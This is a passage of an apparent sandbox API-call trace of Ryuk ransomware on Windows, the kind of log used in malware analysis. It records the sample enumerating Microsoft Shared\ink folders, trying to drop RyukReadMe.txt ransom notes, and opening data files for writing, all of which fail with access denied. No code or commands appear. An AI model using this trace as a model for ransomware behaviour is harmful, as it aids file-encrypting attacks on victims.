lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.644] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.644] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.644] SetLastError (dwErrCode=0x0) [0131.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.644] GetLastError () returned 0x5 [0131.644] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.644] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.644] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.644] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.644] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.644] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.644] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.644] SetLastError (dwErrCode=0x0) [0131.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.644] GetLastError () returned 0x5 [0131.644] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.644] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.644] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.644] SetLastError (dwErrCode=0x0) [0131.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.645] GetLastError () returned 0x5 [0131.645] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.645] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.645] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.645] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.645] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.645] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.645] SetLastError (dwErrCode=0x0) [0131.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.645] GetLastError () returned 0x5 [0131.645] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.645] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", dwFileAttributes=0x80) returned 0 [0131.646] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.646] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.646] SetLastError (dwErrCode=0x0) [0131.646] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.646] GetLastError () returned 0x5 [0131.646] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.646] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.647] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.647] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.647] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.647] SetLastError (dwErrCode=0x0) [0131.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.647] GetLastError () returned 0x5 [0131.647] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.647] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", dwFileAttributes=0x80) returned 0 [0131.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.648] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.648] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", dwFileAttributes=0x80) returned 0 [0131.649] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.649] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.649] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", dwFileAttributes=0x80) returned 0 [0131.649] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.650] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.650] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.650] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", dwFileAttributes=0x80) returned 0 [0131.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.653] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.653] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", dwFileAttributes=0x80) returned 0 [0131.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.654] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", dwFileAttributes=0x80) returned 0 [0131.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.654] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", dwFileAttributes=0x80) returned 0 [0131.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.655] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", dwFileAttributes=0x80) returned 0 [0131.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.656] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", dwFileAttributes=0x80) returned 0 [0131.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.656] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", dwFileAttributes=0x80) returned 0 [0131.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.658] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.659] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", dwFileAttributes=0x80) returned 0 [0131.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.659] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.659] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", dwFileAttributes=0x80) returned 0 [0131.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", dwFileAttributes=0x80) returned 0 [0131.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", dwFileAttributes=0x80) returned 0 [0131.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.661] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", dwFileAttributes=0x80) returned 0 [0131.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.662] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.662] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", dwFileAttributes=0x80) returned 0 [0131.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.662] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.663] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", dwFileAttributes=0x80) returned 0 [0131.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.664] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", dwFileAttributes=0x80) returned 0 [0131.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.664] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", dwFileAttributes=0x80) returned 0 [0131.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.665] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", dwFileAttributes=0x80) returned 0 [0131.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.665] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", dwFileAttributes=0x80) returned 0 [0131.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.668] FindNextFileW (in: 